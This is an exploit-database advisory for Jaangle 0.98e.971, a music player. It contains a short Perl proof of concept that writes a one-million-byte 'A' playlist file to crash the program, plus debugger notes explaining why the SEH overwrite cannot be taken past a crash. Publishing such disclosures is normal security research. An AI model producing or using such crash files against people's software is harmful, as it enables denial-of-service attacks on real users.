Jaangle 0.98e.971 Denial Of Service

2010-08-03T00:00:00
ID PACKETSTORM:92299
Type packetstorm
Reporter Hadji Samir
Modified 2010-08-03T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# jaangle 0.98e.971  
# Author: s-dz , s-dz@hotmail.fr  
# Download : http://www.jaangle.com/files/jsetup.exe  
# Tested : Windows XP SP2 (fr)  
# DATE : 2010-08-02  
#  
# thanks TCT , DGM8  
#  
# EDB Notes:  
# 0012B448 00410041 A.A. jaangle.00410041  
# 0012B44C 00410041 A.A. Pointer to next SEH record  
# 0012B450 00410041 A.A. SE handler  
# 0012B454 00410041 A.A. jaangle.00410041  
# The overwrite is caused by a wsprintfW() function, however the program checks  
# for a XOR'd DWORD at ESP+7D8 with DS:[601E60] (if not matched --> TerminateProcess).  
# Having control over the SEH does not actually cause any exception between wsprintfW()  
# to TerminateProcess().  
  
my $file= "mahboul-3lik00.m3u";  
my $junk= "\x41" x 1000000;  
  
open($FILE, ">$file");  
print($FILE $junk);  
close($FILE);  
print("exploit created successfully");  
  
  
`